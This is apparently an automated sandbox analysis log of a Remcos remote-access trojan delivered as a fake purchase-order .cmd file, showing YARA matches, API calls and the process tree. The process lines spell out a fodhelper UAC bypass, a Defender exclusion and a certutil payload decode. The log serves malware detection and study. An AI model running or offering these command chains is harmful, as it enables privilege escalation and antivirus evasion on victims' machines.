                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.bank.troj.spyw.expl.evad.winCMD@68/35@11/6
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF789BC32B0
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655883F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,14_2_00007FF655883F5C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,25_2_00007FF67DF1826C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA07952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,28_2_1BA07952
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21077952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,36_2_21077952
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BEFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF789BEFB54
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FF8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,28_2_1B9FF8FD
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE77EC0 CoCreateInstance,#357,#207,LocalFree,LocalFree,25_2_00007FF67DE77EC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF43148 FindResourceExW,LoadResource,25_2_00007FF67DF43148
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,28_2_1BA0AB0D
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
                    Source: C:\Users\Public\xkn.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                    Source: C:\Users\Public\Libraries\sppsvc.pifMutant created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Source: C:\Users\Public\xkn.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1Jump to behavior
                    Source: C:\Users\Public\Libraries\sppsvc.pifKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\sppsvc.pifKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\alpha.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
                    Source: C:\Users\Public\alpha.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
                    Source: C:\Users\Public\xkn.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                    Source: unknownProcess created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
                    Source: unknownProcess created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
                    Source: unknownProcess created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pifJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "Jump to behavior
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
